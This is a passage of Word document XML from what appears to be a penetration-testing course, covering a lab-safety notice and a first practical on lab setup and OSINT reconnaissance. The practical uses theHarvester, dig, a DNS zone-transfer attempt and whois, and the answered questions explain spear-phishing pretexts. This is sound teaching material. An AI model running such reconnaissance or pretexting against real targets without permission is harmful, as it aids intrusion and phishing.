        <w:t xml:space="preserve"> must all be in place before any technical activity begins — this is the non-negotiable legal foundation covered in Unit I.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical work then proceeds through reconnaissance, scanning, exploitation and post-exploitation (Units II and III), and, where web applications are in scope, manual testing against the OWASP Top 10 categories using Burp Suite (Unit IV). Throughout, the tester keeps careful evidence — screenshots, tool output, request/response captures — tagged to each finding, and never performs the actual destructive version of "covering tracks", since that would itself cause harm and destroy information the client needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once testing concludes, each finding is scored with a properly justified CVSS v3.1 vector string, and the full set of findings is assembled into the Unit V report structure: cover page, a one-page non-technical executive summary, scope and methodology, detailed technical findings (each with severity, affected system, description, proof of concept, business impact, remediation and CVE/CWE references), a risk heat map plotting likelihood against impact, and a remediation priority table with a conclusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Throughout the whole lifecycle, professional ethics govern the tester's conduct: any out-of-scope finding is handled through responsible disclosure rather than being exploited or ignored, all client data remains confidential under the NDA, and the tester never tests anything without written permission. The final deliverable — the report plus supporting evidence — is what turns weeks of technical work into something a client's management and technical teams can actually act on, which is the entire point of a VAPT engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Practicals — Detailed Guide</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:left w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:bottom w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:right w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A33A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⛔ Lab Safety — Authorised Lab Only</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Every practical below must be performed only inside the isolated lab described in Unit I (Kali Linux attacker + Metasploitable 2 + DVWA targets, Host-Only/Internal network, no route to the real internet). Replace all example IP addresses with your own lab's actual addresses. Where sample output is shown, it is illustrative of the expected format — your own output will differ and must be captured from your own run, not copied from this book.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 1 — Lab Setup &amp; OSINT Reconnaissance (Est. 3 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verify lab environment isolation, confirm all tools are functional, and perform passive OSINT reconnaissance on a simulated target.</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2144"/>
        <w:gridCol w:w="7602"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Kali Linux, Metasploitable 2 (both on Host-Only/Internal network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ifconfig</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, Firefox, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">theHarvester</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">dig</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">whois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Prerequisites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Both VMs imported and able to ping each other; no internet route to the targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Boot both VMs; run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) on each and record both IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">From Kali, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Metasploitable 2 IP to confirm connectivity, and confirm the targets have no route to the real internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Metasploitable 2's web root / DVWA in Firefox from Kali and screenshot the working page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">theHarvester -d &lt;practice-domain&gt; -b all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (use a domain you are authorised to research, or a lab/test domain as instructed) and capture the output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dig &lt;practice-domain&gt; A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and attempt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dig axfr &lt;practice-domain&gt; @&lt;its-nameserver&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; record success or failure with a reason.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whois &lt;practice-domain&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and note the registrar and name servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected output:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> both VM IPs documented; DVWA working screenshot; theHarvester output; DNS records table; zone-transfer result (success or failure, with reason).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation Questions — Answered</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q1. Why does a successful DNS zone transfer represent a security risk?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A successful AXFR hands over the entire DNS zone — every subdomain and internal hostname the organisation has registered — in a single request, giving an attacker a ready-made map of the infrastructure that would otherwise take extensive guessing or brute-forcing to assemble, and potentially exposing hosts never meant to be public.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q2. From LinkedIn OSINT results, what information could an attacker use for a spear-phishing attack?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Job titles, team structure, manager relationships, and technologies or recent projects mentioned in posts let an attacker craft a personalised, believable pretext — for example, impersonating IT support about a specific internal tool the target's team is known to use — which is far more convincing than a generic phishing email.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:left w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:bottom w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:right w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A33A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✗ Common Mistake</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
